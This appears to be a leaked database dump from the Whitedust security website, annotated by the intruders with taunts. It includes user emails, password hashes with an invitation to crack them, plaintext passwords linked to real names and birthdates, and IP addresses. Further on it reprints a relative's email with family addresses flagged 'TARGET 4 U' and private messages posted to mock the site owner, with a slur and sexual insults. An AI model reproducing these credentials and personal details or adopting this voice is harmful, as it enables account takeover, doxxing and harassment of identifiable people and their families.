INSERT INTO `wd3_invites` VALUES (32, 'adi.zerok@gmail.com', 2, 1);
INSERT INTO `wd3_invites` VALUES (33, 'dancho.danchev@hush.com', 2, 0);
INSERT INTO `wd3_invites` VALUES (34, 'rdx@chemist.com', 2, 1);
INSERT INTO `wd3_invites` VALUES (35, 'tetsuharu@gmail.com', 14, 1);
INSERT INTO `wd3_invites` VALUES (36, 'adrian.daly@whitedust.net', 2, 0);
INSERT INTO `wd3_invites` VALUES (37, ' phantom1984@mail.gr', 14, 1);
INSERT INTO `wd3_invites` VALUES (38, 'itek.etx@gmail.com', 2, 1);
INSERT INTO `wd3_invites` VALUES (39, 'crazyferk@hotmail.com', 2, 0);
INSERT INTO `wd3_invites` VALUES (40, 'mukkanythio@hotmail.com', 2, 0);
INSERT INTO `wd3_invites` VALUES (41, 'todreamofautumn@gmail.com', 2, 1);
INSERT INTO `wd3_invites` VALUES (42, 'christopher.hogg@gmail.com', 2, 1);
INSERT INTO `wd3_invites` VALUES (43, 'screv@hotmail.com', 2, 1);
INSERT INTO `wd3_invites` VALUES (44, 'zaphodb777@gmail.com', 2, 0);
INSERT INTO `wd3_invites` VALUES (45, 'naxxtor@hackervoice.co.uk', 2, 0);
^^^^^ lawl noob
INSERT INTO `wd3_invites` VALUES (46, 'peter.prickett@whitedust.net', 2, 1);
INSERT INTO `wd3_invites` VALUES (47, 'peter.prickett@hotmail.com', 2, 1);
INSERT INTO `wd3_invites` VALUES (48, 'mukkanyhtio@hotmail.com', 2, 1);
INSERT INTO `wd3_invites` VALUES (49, 'jswray@hotmail.com', 2, 1);
INSERT INTO `wd3_invites` VALUES (50, 'punkle.jones@gmail.com', 2, 1);
INSERT INTO `wd3_invites` VALUES (51, 'carlysmith@hotmail.com', 2, 0);
INSERT INTO `wd3_invites` VALUES (52, 'trammel@cdc-nsf.com', 2, 1);
INSERT INTO `wd3_invites` VALUES (53, 'chunky_lover785@msn.com', 14, 1);
INSERT INTO `wd3_invites` VALUES (54, 'wajkas@gmail.com', 2, 1);
INSERT INTO `wd3_invites` VALUES (55, 'webmistress@rqporn.com', 14, 0);
INSERT INTO `wd3_invites` VALUES (56, 'necromancer.rob@gmail.com', 23, 1);
INSERT INTO `wd3_invites` VALUES (57, 'n00dles@neocyber.info', 2, 0);
INSERT INTO `wd3_invites` VALUES (58, 'kuza55@gmail.com', 2, 1);
INSERT INTO `wd3_invites` VALUES (59, 'quorbeau@gmail.com', 2, 1);
INSERT INTO `wd3_invites` VALUES (60, 'alistair.lamont@gmail.com', 2, 1);
INSERT INTO `wd3_profiles` VALUES (6, 8, 'Voshika', 'The voice from the
dark.', 'You don\\''t know me. But I\\''ve always been here.', 'Many.',
'Man
y.', 'voshika [at] hakspace.net',
'http://www.hakspace.net/avatarimages/voshika.jpg',
'/home/markande/domains/hakspace.net/public_html/avatarimages/
voshika.jpg', '');
We know you. You're that goatraper psg.
-- Dumping data for table `wd3_rssfeeds`
--
INSERT INTO `wd3_rssfeeds` VALUES (1, '',
'http://www.techdirt.com/techdirt_rss.xml');
INSERT INTO `wd3_rssfeeds` VALUES (2, '',
'http://slashdot.org/slashdot.xml');
INSERT INTO `wd3_rssfeeds` VALUES (3, '',
'http://news.bbc.co.uk/rss/newsonline_uk_edition/technology/rss.xml');
INSERT INTO `wd3_rssfeeds` VALUES (4, '',
'http://www.theregister.co.uk/headlines.rss');
INSERT INTO `wd3_rssfeeds` VALUES (5, '',
'http://www.moreover.com/cgi-local/page?feed=129&o=rss');
INSERT INTO `wd3_rssfeeds` VALUES (6, '',
'http://msdn.microsoft.com/security/rss.xml');
INSERT INTO `wd3_rssfeeds` VALUES (7, '',
'http://www.networkcomputing.com/rss/rss-security.jhtml');
INSERT INTO `wd3_rssfeeds` VALUES (8, '',
'http://www.networkworld.com/rss/security.xml');
INSERT INTO `wd3_rssfeeds` VALUES (9, '',
'http://www.topix.net/rss/tech/computer-security.xml');
INSERT INTO `wd3_rssfeeds` VALUES (10, '',
'http://feeds.feedburner.com/zdnetuk/security');
INSERT INTO `wd3_rssfeeds` VALUES (11, '',
'http://feeds.computerworld.com/Computerworld/Hacking/News');
INSERT INTO `wd3_rssfeeds` VALUES (12, '',
'http://feeds.computerworld.com/Computerworld/Security/News');
INSERT INTO `wd3_rssfeeds` VALUES (13, '',
'http://feeds.computerworld.com/Computerworld/Security/Holes/News');
INSERT INTO `wd3_rssfeeds` VALUES (14, '',
'http://feeds.computerworld.com/Computerworld/Worms/News');
INSERT INTO `wd3_rssfeeds` VALUES (15, '',
'http://feeds.computerworld.com/Computerworld/Macintosh/News');
INSERT INTO `wd3_rssfeeds` VALUES (16, '',
'http://www.neworder.box.sk/xml.php');
INSERT INTO `wd3_rssfeeds` VALUES (17, '',
'http://rtfm.spaces.live.com/feed.rss');
INSERT INTO `wd3_rssfeeds` VALUES (18, '',
'http://www.frsirt.com/exploits.xml');
INSERT INTO `wd3_rssfeeds` VALUES (19, '',
'http://www.securitypark.co.uk/rss/rss.asp');
INSERT INTO `wd3_rssfeeds` VALUES (20, '',
'http://rss.windowsecurity.com/allnews.xml');
INSERT INTO `wd3_rssfeeds` VALUES (21, '',
'http://secunia.com/information_partner/anonymous/o.rss');
INSERT INTO `wd3_rssfeeds` VALUES (22, '',
'http://populicio.us/newlinks.rss');
INSERT INTO `wd3_rssfeeds` VALUES (23, '',
'http://digg.com/rss/indexsecuritydig.xml');
INSERT INTO `wd3_rssfeeds` VALUES (24, '',
'http://www.cultdeadcow.com/cms/index.xml');
INSERT INTO `wd3_rssfeeds` VALUES (25, '',
'http://www.whitedust.net/articles.rss');
INSERT INTO `wd3_rssfeeds` VALUES (26, '',
'http://research.eeye.com/rss/zeroday.rss');
INSERT INTO `wd3_rssfeeds` VALUES (27, '',
'http://www.lockdown.co.uk/wp-rss2.php');
INSERT INTO `wd3_rssfeeds` VALUES (28, '',
'http://www.gamesradar.com/us/rss/game_news_feed.jsp');
INSERT INTO `wd3_rssfeeds` VALUES (29, '',
'http://rss.slashdot.org/Slashdot/slashdotGames');
INSERT INTO `wd3_rssfeeds` VALUES (30, '',
'http://darkzero.co.uk/cms/rss.php?section=Gaming');
INSERT INTO `wd3_rssfeeds` VALUES (31, '',
'http://feeds.wired.com/wired/culture/joystick');
INSERT INTO `wd3_rssfeeds` VALUES (32, '',
'http://www.gamesindustry.biz/rss/gamesindustry_news_feed.rss');
INSERT INTO `wd3_rssfeeds` VALUES (33, '',
'http://feeds.joystiq.com/weblogsinc/joystiq');
INSERT INTO `wd3_rssfeeds` VALUES (34, '',
'http://feeds.feedburner.com/2old2play');
INSERT INTO `wd3_rssfeeds` VALUES (35, '',
'http://digg.com/rss/containergaming.xml');
INSERT INTO `wd3_rssfeeds` VALUES (36, '',
'http://www.computerandvideogames.com/rss/feed.php?priority=1&limit=100');
INSERT INTO `wd3_rssfeeds` VALUES (37, '',
'http://scripts.ign.com/rss/ign.all.2.0.xml');
INSERT INTO `wd3_rssfeeds` VALUES (38, '',
'http://www.eurogamer.net/rss/eurogamer_frontpage_feed.rss');
INSERT INTO `wd3_rssfeeds` VALUES (39, '',
'http://www.linux-gamers.net/backend.php');
INSERT INTO `wd3_rssfeeds` VALUES (40, '',
'http://www.gamedaily.com/feeds/content/rss/biz_news.xml');
INSERT INTO `wd3_rssfeeds` VALUES (41, '',
'http://www.gamedaily.com/feeds/content/rss/biz_features.xml');
INSERT INTO `wd3_rssfeeds` VALUES (42, '',
'http://www.gamedaily.com/feeds/content/rss/biz_interviews.xml');
INSERT INTO `wd3_rssfeeds` VALUES (43, '',
'http://www.gamedaily.com/feeds/content/rss/biz_myturn.xml');
INSERT INTO `wd3_rssfeeds` VALUES (44, '',
'http://www.gamedaily.com/feeds/content/rss/biz_media.xml');
INSERT INTO `wd3_rssfeeds` VALUES (45, '',
'http://www.gamedaily.com/feeds/content/rss/biz_adwatch.xml');
INSERT INTO `wd3_rssfeeds` VALUES (46, '',
'http://www.gamedaily.com/feeds/content/rss/biz_toppers.xml');
INSERT INTO `wd3_rssfeeds` VALUES (47, '',
'http://www.gamedaily.com/feeds/content/rss/biz_movers.xml');
INSERT INTO `wd3_rssfeeds` VALUES (48, '',
'http://www.offensivecomputing.net/?q=node/feed');
INSERT INTO `wd3_rssfeeds` VALUES (49, '',
'http://feeds.feedburner.com/darknethackers');
INSERT INTO `wd3_rssfeeds` VALUES (50, '',
'http://www.milw0rm.com/rss.php');
INSERT INTO `wd3_rssfeeds` VALUES (51, '',
'http://www.spacerogue.net/wordpress/?feed=rss2');
INSERT INTO `wd3_rssfeeds` VALUES (52, '',
'http://www.hackwire.com/modules.php?modname=backend&action=rdf');
INSERT INTO `wd3_rssfeeds` VALUES (53, '',
'http://bbs.progenic.com/RssFeed32-0-0-1.aspx');
INSERT INTO `wd3_rssfeeds` VALUES (54, '', 'http://www.2600.com/rss.xml');
INSERT INTO `wd3_rssfeeds` VALUES (55, '',
'http://www.viruslist.com/en/rss/latestnews');
INSERT INTO `wd3_rssfeeds` VALUES (56, '',
'http://www.thc.org/rss.xml.php');
INSERT INTO `wd3_rssfeeds` VALUES (57, '',
'http://www.virusbtn.com/feeds/virus_news.rdf');
INSERT INTO `wd3_rssfeeds` VALUES (58, '',
'http://www.darkreading.com/rss_simple.asp?f_s=296&f_ln=Dark+Reading+News+
Analysis');
INSERT INTO `wd3_rssfeeds` VALUES (59, '',
'http://www.defcon.org/defconrss.xml');
INSERT INTO `wd3_rssfeeds` VALUES (60, '',
'http://www.greekhackers.gr/rss.php?cat_id=12');
INSERT INTO `wd3_rssfeeds` VALUES (61, '',
'http://www.mantisbt.org/bugs/issues_rss.php?');
INSERT INTO `wd3_rssfeeds` VALUES (62, '',
'http://www.i-hacked.com/component/option,com_rss/feed,RSS0.91/no_html,1/'
);
Again, only the most elite and accurate websites are used for information
gathering.
In case you were wondering, that empty second field is "Name".
Who wants hashes to crack?
INSERT INTO `wd3_users` VALUES (1, 'mark.anderson@whitedust.net',
'cronus', 'd519e62be0c9632870a3dd34f5f193cd',
'6d401951bb8c76682f79df0ba253f531',
1, 1, '83-71-12-6.b-ras1.dbn.dublin.eircom.net', 'Thu, 02 Aug 2007
16:03:25 +0100');
INSERT INTO `wd3_users` VALUES (2, 'mark.hinge@whitedust.net', 'psg',
'2e6775fe7657fdac368f11a98e0a74c1', '5c64a9c224eb17aee23c82d44bf7c9f3', 1,
1,
'host86-152-13-153.range86-152.btcentralplus.com', 'Fri, 03 Aug 2007
01:10:05 +0100');
INSERT INTO `wd3_users` VALUES (4, 'jake.black@whitedust.net', 'jake',
'2b19bb9fc912317039ace2031505b625', '87fea60da86d4262c2c20561cef903e0', 0,
1,
'83-71-10-237.b-ras1.', 'Mon, 02 Jul 2007 02:53:37 +010');
INSERT INTO `wd3_users` VALUES (7, 'info@mellow.ie', 'mellowchris',
'a269d17349ce29a77a89c7ec4ed0c3d4', '84fdbab4eb24844c4bded8579217a8ba', 0,
1, '8
3-71-12-6.b-ras1.dbn.dublin.eircom.net', 'Thu, 12 Jul 2007 03:47:45
+0100');
INSERT INTO `wd3_users` VALUES (5, 'retro@hakspace.net', 'retro',
'e0a0d4162d56990708c1830e1683ed70', 'f96d966955379c65b28f94570f358410', 0,
1, 'hos
t86-128-45-114.range86-128.btcentralp', 'Tue, 17 Jul 2007 16:00:24
+0100');
INSERT INTO `wd3_users` VALUES (6, 'liamshee@hushmail.com', 'liamshee',
'187c9c16abffd86e11242405433d849f', 'a5f0b5800a8d4bb7254f24f3860a67fa', 0,
1
, 'host86-128-233-133.range86-128.btcentral', 'Tue, 10 Jul 2007 03:00:16
+0100');
INSERT INTO `wd3_users` VALUES (8, 'voshika@hakspace.net', 'voshika',
'e5271d126841229f857adbf4bc5c9db7', '1100059027b26be1b10d6d64357184c0', 0,
1,
'host86-128-233-133.range86-128.btcentral', 'Thu, 12 Jul 2007 16:13:41
+0100');
INSERT INTO `wd3_users` VALUES (9, 'whitedust@hakspace.net', 'Whitedust',
'e5271d126841229f857adbf4bc5c9db7', '7b43cd9195cfc4661b0ea9932e3c2189', 0,
1, 'host86-128-234-65.range86-128.btcentralp', 'Thu, 12 Jul 2007 17:22:10
+0100');
INSERT INTO `wd3_users` VALUES (10, 'hakspace@hakspace.net', 'hakspace',
'e5271d126841229f857adbf4bc5c9db7', '3fd50767862786f59bd99371c314ea39', 0,
1, 'host86-128-234-65.range86-128.btcentralp', 'Thu, 12 Jul 2007 19:19:47
+0100');
INSERT INTO `wd3_users` VALUES (11, 'zachary.ehnerd@whitedust.net',
'ComradeSmack', '4d86b29292a7402d5b3f71343047214b',
'b015749926916024a1d54daec6f
d022e', 1, 1, 'gw.taylorcreek.net', 'Thu, 26 Jul 2007 18:18:26 +0100');
INSERT INTO `wd3_users` VALUES (12, 'adi.zerok@gmail.com', 'Aditya_KS',
'ad7995f8341feebed0ad8725de84f588', 'bd7ace6c2946490bb9be9eeba52e0881', 0,
1
, 'unknown', 'Sun, 29 Jul 2007 13:30:49 +0100');
INSERT INTO `wd3_users` VALUES (13, 'kyrill.poole@gmail.com', 'morts',
'87421107f3614c98c5bdc82aa1404956', '73d2bbcc0ea0a9d462982e4823725410', 0,
1,
'80-193-38-51.cable.ubr05.hari.blueyonder.co.uk', 'Wed, 25 Jul 2007
22:00:26 +0100');
INSERT INTO `wd3_users` VALUES (14, 'Oracle.GreenDiamond@gmail.com',
'Oracle GreenDiamond', 'e61e3ea9fe90b504c95f65bfcfb4c238',
'3f8c86af14cbf6f55a0
bee274ee4fd32', 0, 1, 'adsl-69-149-39-229.dsl.rcsntx.swbell.net', 'Mon, 23
Jul 2007 12:36:05 +0100');
INSERT INTO `wd3_users` VALUES (15, 'talonprime@gmail.com', 'tprime',
'8b65996657feab900109f216f4b951b6', '18af855ff840c8cf5ca7c1999fddf055', 0,
1,
'adsl-75-45-93-66.dsl.sfldmi.sbcglobal.ne', 'Wed, 18 Jul 2007 19:32:47
+0100');
INSERT INTO `wd3_users` VALUES (16, 'mark.collins@westgateit.com',
'Nurgle', '73a6fcb016535503154cecf09b787015',
'ae1c721022955c92c9041bea5455f7b7',
0, 1, '82.109.255.212', 'Wed, 18 Jul 2007 08:47:27 +0100');
INSERT INTO `wd3_users` VALUES (17, 'tetsuharu@gmail.com', 'Tetsuharu',
'c1f51b71d7bde16cecc0fc72261d029f', 'c4b2b1d5077c5f58c0c5eebd50f33a1b', 0,
1
, '48.81.33.65.cfl.res.rr.com', 'Wed, 18 Jul 2007 10:09:49 +0100');
INSERT INTO `wd3_users` VALUES (18, ' phantom1984@mail.gr', 'Dr_Brain',
'ca507447d11585985bfdd414fb3ea852', 'daa5e6c82cd13b861e6caaa253455892', 0,
1
, 'ppp140-071.dsl.hol.gr', 'Thu, 19 Jul 2007 13:02:52 +0100');
INSERT INTO `wd3_users` VALUES (19, 'prgmmstr@hotmail.com', 'mubix',
'1c87b47a691915447b56e9b84a9b6604', '82810223ef6c28001c12aa6fef3799d5', 0,
1, '
c-71-62-129-120.hsd1.va.comcast.net', 'Wed, 01 Aug 2007 11:35:31 +0100');
INSERT INTO `wd3_users` VALUES (20, 'kussic@mac.com', 'Kussic',
'72004baeee8546c67a47cd8e394bcc04', '02512c236fbdb221e30f921fe9782d84', 0,
1, '82.13
3.27.16', 'Thu, 19 Jul 2007 14:13:15 +0100');
INSERT INTO `wd3_users` VALUES (21, 'robohara@robohara.com', 'Flack',
'90a0601580134d67ce16bb82c16d2214', '06424d5bae95b52387d0393895cd8b57', 0,
1,
'ip72-192-103-188.ok.ok.cox.net', 'Tue, 24 Jul 2007 01:37:29 +0100');
INSERT INTO `wd3_users` VALUES (22, 'ganesh.devarajan@gmail.com',
'64n35h', 'c0810fdb65d4d3b3461c869bc90e6b10',
'919890bb648b9ab434b001ac085a3893',
0, 1, 'cpe-70-112-202-108.austin.res.rr.com', 'Wed, 18 Jul 2007 13:08:17
+0100');
INSERT INTO `wd3_users` VALUES (23, 'Nox_Deveraux@hotmail.com', 'vioxis',
'0da2e7fa0ba90f4ae031b0d232b8a57a', '0dd98cc3556dba409cc1d2258516ac8a', 0,
1, '208.29.184.11', 'Sat, 28 Jul 2007 20:16:29 +0100');
INSERT INTO `wd3_users` VALUES (24, 'itek.etx@gmail.com', 'lady_mars',
'5ce75b5b9319d36542ee0d1d494bf621', '13138e07f8891fc8afb1c64850ccefb2', 0,
1,
'12.5.189.75', 'Mon, 23 Jul 2007 01:53:27 +0100');
INSERT INTO `wd3_users` VALUES (25, 'christopher.hogg@gmail.com', 'cj',
'b4848d476a1040784bb82509af540e38', 'fb14962c5efc961014879d2f78e8ae53', 0,
1
, 'mail.btl.fki-eng.com', 'Tue, 31 Jul 2007 07:50:50 +0100');
INSERT INTO `wd3_users` VALUES (26, 'peter.prickett@whitedust.net',
'chickensoup', 'dd22141acb5ea065acd5ed773729c98f',
'dfdb395b1ab1d8fc5c8293776067
13d7', 0, 1, 'host86-132-153-90.range86-132.btcentralp', 'Sun, 22 Jul 2007
21:18:16 +0100');
INSERT INTO `wd3_users` VALUES (27, 'mukkanyhtio@hotmail.com', 'LiX',
'bb358eb6ff2cc1090440672054575989', '0b84dd49a63297d7dd200afe4d32dffa', 0,
1,
'host81-132-154-93.range81-132.btcentralp', 'Fri, 20 Jul 2007 21:32:33
+0100');
INSERT INTO `wd3_users` VALUES (28, 'punkle.jones@gmail.com', 'Punkle
Jones', '87515c72861add9379aa60a08016c21a',
'0473fa091f52c806b8c7b3a71f084729'
, 0, 1, 'ppp-70-250-245-58.dsl.okcyok.swbell.net', 'Sat, 28 Jul 2007
14:41:58 +0100');
INSERT INTO `wd3_users` VALUES (29, 'screv@hotmail.com', 'screv',
'4aaad5269c580a6afd8333d73e417b5e', '05add5fc85480184193373e93967d002', 0,
1, '',
'');
INSERT INTO `wd3_users` VALUES (30, 'todreamofautumn@gmail.com',
'xjessicax', 'ddd956c117486cba6efef9fcc4c38549',
'da04e14d4c039662bc38819516f919f8'
, 0, 1, 'adsl-68-77-83-243.dsl.ipltin.ameritech.n', 'Sat, 21 Jul 2007
17:35:16 +0100');
INSERT INTO `wd3_users` VALUES (31, 'jswray@hotmail.com', 'Hellz UK',
'd8578edf8458ce06fbc5bb76a58c5ca4', '472f465cf3d1097d6ae1cf585d74aa2d', 0,
1,
'host81-129-181-47.range81-129.btcentralplus.com', 'Wed, 01 Aug 2007
23:56:02 +0100');
INSERT INTO `wd3_users` VALUES (32, 'chunky_lover785@msn.com',
'NewWorldOrder', '6ccbdfc9c41f21c577331ce1b4c5875b',
'8f241d7a198e764c5e95ea9e7697864
c', 0, 1, '5ac9ecc0.bb.sky.com', 'Tue, 31 Jul 2007 22:46:20 +0100');
INSERT INTO `wd3_users` VALUES (33, 'wajkas@gmail.com', 'wajkas',
'70974db54da50ee0fa363c2b20eb46df', '64f75409f09dc05d7944740bbe4ec01f', 0,
1, 'vpn
-gw.litnet.lt', 'Sat, 21 Jul 2007 17:07:13 +0100');
INSERT INTO `wd3_users` VALUES (34, 'necromancer.rob@gmail.com',
'necr0mancer', '43371c754833d6be991831ec2fa04687',
'97840296bac872ae64479b21a65c7da
e', 0, 1, 'c-76-98-108-129.hsd1.nj.comcast.net', 'Fri, 03 Aug 2007
06:16:05 +0100');
INSERT INTO `wd3_users` VALUES (35, 'trammel@cdc-nsf.com', 'trammel',
'd18ead8b5c3dd1dc37ce603455ecf474', '1a692f5451b312dcf328bf074fe6eacd', 0,
1,
'adsl-75-50-162-175.dsl.lsan03.sbcglobal.', 'Mon, 23 Jul 2007 23:55:49
+0100');
INSERT INTO `wd3_users` VALUES (36, 'kuza55@gmail.com', 'kuza55',
'ab3909976ec026ff9367f8927eded72f', '73595efe84a70c59a8ad7dca28bea02e', 0,
1, '58.
173.121.20', 'Thu, 02 Aug 2007 08:28:00 +0100');
INSERT INTO `wd3_users` VALUES (37, 'quorbeau@gmail.com', 'quorbeau',
'f5dd3bc2d6a0d7211312d316751bb5f3', '6615fa406f966169c453bb870b2a26ae', 0,
1,
'mo-71-1-109-220.dhcp.embarqhsd.net', 'Tue, 24 Jul 2007 19:28:14 +0100');
INSERT INTO `wd3_users` VALUES (38, 'rdx@chemist.com', 'Sniper223',
'f9e93130b80baea0f396e59d48400505', '2130dd61b965e603e7ddc60f046693d6', 0,
1, 't
gtel18.eastky.net', 'Thu, 02 Aug 2007 13:25:17 +0100');
INSERT INTO `wd3_users` VALUES (39, '', 'el',
'0b42e961db6b8add04df0b01ad5e7283', '', 0, 1,
'83-71-12-6.b-ras1.dbn.dublin.eircom.net', 'Thu, 02 Aug
2007 01:09:11 +0100');
INSERT INTO `wd3_users` VALUES (40, 'alistair.lamont@gmail.com', 'f15h',
'987061aee7171c3616c0ea82841f54b6', '8bcd0dbeb5544c2af6ad319d5db9dbd7', 0,
1, '63.110.187.40', 'Thu, 02 Aug 2007 22:11:13 +0100');
lol @ chunky_lover785@msn.com. These are the 40 elite hackers that form
the WD hoard! But they aren't really 40. Notice how hakspace@hakspace.net,
voshika@hakspace.net, and whitedust@hakspace.net are all represented
alongside mark.anderson and mark.hinge. Who knows what aliases they have
taken up to try to make it look like they have supporters.
Here, see some of the people reading the WD newsletter!
INSERT INTO `wd_newsletter` VALUES (19, 'sirukin@gmail.com');
^^^^ sirukin got right on that
INSERT INTO `wd_newsletter` VALUES (162, '');
^^^^^ here be not WD parsing skillz
INSERT INTO `wd_newsletter` VALUES (369, 'me@markanderson.ie');
^^^^ omg site to hax
INSERT INTO `wd_newsletter` VALUES (239, '\\"rapidshare login
GENERATOR\\"'); <- lawl these get good
INSERT INTO `wd_newsletter` VALUES (329, 'picklejuice@gmail.com');
^^^^ I think we found ourselves a FAGGOT
INSERT INTO `wd_newsletter` VALUES (317, 'msn pirate');
^^^^^ kid you need an email address!
INSERT INTO `wd_newsletter` VALUES (392, 'mark.anderson@whitedust.net');
^^^^^ pretty late signup for the owner
INSERT INTO `wd_newsletter` VALUES (443, 'redsand@blacksecurity.org');
^^^^^^ how blacksecurity keeps up with the scene
Check out how popular WD is!
INSERT INTO `wd_polls` VALUES (9, 'Should Vulnerability\\''s Be Made
Public?', 'Always', 'At Times', 'Never', '', '', 44, 23, 0, 0, 0);
INSERT INTO `wd_polls` VALUES (5, 'Attending Any Security Cons This
Year?', 'Nope', '1', '2-4', '4+', '', 65, 6, 1, 2, 0);
INSERT INTO `wd_polls` VALUES (10, 'It is acceptable for a security patch
to take...', 'Under a week', 'A week to a month', 'Over a month', '', '',
48, 22, 3, 0, 0);
Check out the slashdot effect (and now you see why they try to trick
slashdot into carrying their articles):
INSERT INTO `wd_polls` VALUES (24, 'Do You Still Trust Firefox?', 'Yes',
'No', 'Not As Much', '', '', 2414, 346, 75, 0, 0);
Check out some unhashed passwords!
-- Dumping data for table `wd_users`
--
INSERT INTO `wd_users` VALUES (7, 0, '|PaRiS|', '01j0uwwx1207', 'Male',
'Mr.', 'Mark', 'Hinge', 'mark.hinge@whitedust.net', 'United Kingdom',
'Inter
net/Web Development', 'Computers/Software/Technology', 'Whitedust
Security', 'Approve purchase', '1-9', 'University / Tertiary', '11/08/80',
'Other'
, 0, 1);
INSERT INTO `wd_users` VALUES (6, 0, 'cronus', '5landl0rd23', 'Male',
'Mr.', 'Mark', 'Anderson', 'mark.anderson@whitedust.net', 'Ireland',
'Internet
/Web Development', 'Computers/Software/Technology', 'Self employed',
'Approve purchase', '1-9', 'High School / Secondary', '18/11/1981',
'Friend/Fam
ily', 0, 1);
INSERT INTO `wd_users` VALUES (44, 0, 'hawkwind', 'guiness', '', NULL,
NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL,
NULL,
NULL);
INSERT INTO `wd_users` VALUES (45, 0, 'cjz0r', 'badgers9191', '', NULL,
NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL,
NULL
, NULL);
INSERT INTO `wd_users` VALUES (46, 0, 'smack', 'm00c0w', '', NULL, NULL,
NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL,
NUL
L);
Check out the elite six character password of cDc's latest NSF member!
OK enough DB. Nothing else fun at all, unless you think Whitedust news
pages are fun. And if you do we probably don't want to know you.
It's time for some less Cronus and more psg.
psg's emails are boring. Lots of spam. Lots of lame
myspace/facebook/securityfocus/eveonline. And he deletes stuff quickly
(score one for psg!). So this is about the only thing to entertain you at
all, our little Hinge family get together for a murder mystery.
Return-path: <christopher.hinge@btinternet.com>
Envelope-to: mark.hinge@whitedust.net
Delivery-date: Sat, 04 Aug 2007 12:06:42 +0100
Received: from web86611.mail.ird.yahoo.com ([217.146.188.208])
by gorlois.blacknight.ie with smtp (Exim 4.60)
(envelope-from <christopher.hinge@btinternet.com>)
id 1IHHSv-0005hu-Ta
for mark.hinge@whitedust.net; Sat, 04 Aug 2007 12:06:39 +0100
Received: (qmail 50235 invoked by uid 60001); 4 Aug 2007 11:06:37 -0000
DomainKey-Signature: a=rsa-sha1; q=dns; c=nofws;
s=s1024; d=btinternet.com;
h=X-YMail-OSG:Received:Date:From:Subject:To:Cc:MIME-Version:Content-Type:C
ontent-Transfer-Encoding:Message-ID;
b=ZThooFV+FK1oQRW5zpoubx0AgulTVw9Oa1cIN38tbLEAN9+lpTtLHn+o4ZdQKG008tYtd7pC
KOzT3WOvwIR6UNgobA2xA5kXA4axyd9G0WU3xfvFoHCJHNSjpM1Qt1t1vXCk4+Goqpi5T4
qFDDmu8ipZkO9bXnvlIqtF41kGdt8=;
X-YMail-OSG: nyKJkQkVM1nufe4xjeLFQwzBJRPuN1DmH4nNZrKi
Received: from [86.152.13.153] by web86611.mail.ird.yahoo.com via HTTP;
Sat, 04 Aug 2007 12:06:36 BST
Date: Sat, 4 Aug 2007 12:06:36 +0100 (BST)
From: CHRISTOPHER HINGE <christopher.hinge@btinternet.com> <- TARGET 4 U
Subject: MURDER NIGHT!
To: linda leech <lindajaneleech@hotmail.co.uk>, <- TARGET 4 U
Rosie Hinge <rosiehinge@btinternet.com>, <- TARGET 4 U
Mark Hinge <mark.hinge@whitedust.net>
Cc: C Hinge <chrishinge@hotmail.com> <- TARGET 4 U
Does anyone want the "Murder Mystery AUG 2007.pdf" that came with it?
psg's myspace account is much more exciting. Fun stuff down there.
Let's start by showing off his fake hacker highlights.
########################################
From: st3x
http://www.myspace.com/st3x
Date: Mar 17, 2007 2:58 PM
Flag as Spam or Report Abuse [ ? ]
Subject: UK Scene
Body: Hey man, I just read your reply to my blog comment.
I really want to do everything I can to facilitate the growth of the UK
scene. It's only in the last 6 or 7 months that I've started to look into
the UK scene - I guess there comes a point where everyone wants to
associate themselves with people like themselves through choice rather
than through courtesy formed from proximity.
I've met a few people over hvr, and have tried (and failed) to arrange a
meet in Leeds. I'll be frequenting the Manchester 2600 meet for the first
time this month, but I really want to bring new people to the scene. I
figured that a good place would be to start would be looking at activist
groups in the UK (especially Human rights groups) from all different
areas, introducing them to programs such as Torpark and scatterchat and
getting them to acknowledge the importance of the internet as a means of
communication and organisation. From this collaboration I hope people with
similar interests to ourselves, who shy away from particular 'agendas',
will see that there is a society without such alliances that they can fall
back on. Maybe that last point isn't so clear? When I went to Uni I ended
up getting involved with the Socialist workers party. I felt like I wanted
to get 'involved' and they swept me up. After a while I realised that they
weren't for me and left - only to get approached by the anarchist
federation and then worlwiderevolution. All the time, I felt a need to get
involved, but never found the 'UK Scene' to facilitate it. I've got more
from the US 2600/EU scene in the last 6 months than I did from 3 years in
association with these groups.
You are without a doubt, a key member of the UK scene. I've seen your name
on every portal I've visited, so I need to ask you - do you think I've got
a chance? What do you think of my plan? You are obviously involved a lot
more than me, and if you think my efforts would be put to better use, I'll
happily take my lead from you. I know that sounds a bit sheepish, but I
really want help build the scene, for the scene and the people yet to
come. This is bigger than you and me, but you have been involved for
longer and will have a better understanding of what it needs.
I look forward to hearing from you.
Best wishes,
st3x
########################################
WE HAVE IDENTIFIED THE SPECIFIC BEST DAY OF PSG'S LIFE
From: PSG
Date: Dec 17 2006 7:02 PM
The book came out
and i am in cult of the dead cow.
this is all.
########################################
And that is all of psg's fake hacker lifestyle. The rest is the home life!
########################################
From: PSG
Date: Dec 18 2006 11:14 PM
I cleaned and polished and dusted etc etc as well and mopped (obviously).
We need a new mop though.
And if you cna get some salad/lettice from tesco's on the way home (there
is no money in the house) and I will make nice kebab things for dinner. Oh
tomato's as well.
I've fixed the network as well -should- be fine; works on the media
center.
Where is my lunch hidden?
xxx
^ The daily activities of a hardcore fake hacker
########################################
From: PSG
Date: Dec 19 2006 12:18 AM
You are getting all my money when I get paid at the end of the month - as
per.
What you then do with that money is up to you.
Because that is what WE agreed.
Whatever you told Laura has nothing to do with me because it wasn't what I
agreed so don't really want to hear about it :)
x
^ psg tells his hooker to keep her mouth shut
I ONLY PAID YOU TO SAY I HAVE A BIG DICK NOW STOP TALKING ABOUT LAURA AND
OPEN YOUR MOUTH
########################################
lol! couldn't have put it better myself!
the main point of this is that we'll be fine. worst comes to the worst, we
find somewhere with one nice big bedroom for £700 a month including
bills, which is only £100 more than we're paying now, and which we'll
both soon easily have. and we get all the excitement of moving all over
again. and she will be back at home with her parents doing her washing.
again.
checking it out, they even have places exactly like that on our road, and
the
road in between that links our side with jon and claire's side. we're
going to be fine. she, on the other hand, can do as she damn well pleases
:)
did you find your food?
smiles and kisses :)
xxx
----------------- Original Message -----------------
From: PSG
Date: Dec 18 2006 11:46 PM
You don't have to explain to me. she's an idiot.
but when push comes to shove...
if she doesn't want to, WE are not the one's who will have to go home :P
we can find somewhere between us on the evidence of the last few months,
she'll be stright back home... and adrian and her... well
she needs to think before she opens her trap.
^ psg turns around and starts talking about LAURA!
########################################
From: PSG
